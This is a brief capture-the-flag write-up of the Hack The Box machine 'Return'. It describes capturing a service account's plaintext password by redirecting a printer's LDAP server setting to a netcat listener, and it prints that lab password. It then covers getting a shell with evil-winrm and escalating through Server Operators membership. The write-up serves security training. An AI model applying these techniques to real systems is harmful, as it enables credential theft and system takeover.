Post

HTB Windows Easy: Return

Return is an Easy rated Windows machine on HTB.

Posted
By Gregory Allegoet
1 min read
HTB Windows Easy: Return

Nmap

Pasted image 20240714201013.png

Initial Foothold

Enumerating HTTP (Port 80)

Browsing to the webpage and going over to the settings tab we see some interesting information like username and password. Pasted image 20240714201008.png

Since we can’t see the password we’ll have to send it to our computer using a request, for this we can change the server address to our VPN IP and set up a NC listener on port 389 to get the request from the server. Pasted image 20240714201003.png

When we press update we should see the password in plaintext in our NC listener: svc-printer:1edFg43012!!. Pasted image 20240714200959.png

Shell

To get a shell we can simply use the credentials and evil-winrm. Pasted image 20240714200953.png

Priv Esc

Since we are part of the Server Operators group we can escalate our privileges. Pasted image 20240714200948.png

Follow guide in sources to priv esc. Pasted image 20240714200942.png

Your nc listener should’ve turned into a shell. Pasted image 20240714200938.png

User.txt

Pasted image 20240714200924.png

Root.txt

Pasted image 20240714200920.png

You have PWNED!!!

Pasted image 20240714200916.png

Sources

CTF, HTB
Windows Easy
This post is licensed under CC BY 4.0 by the author.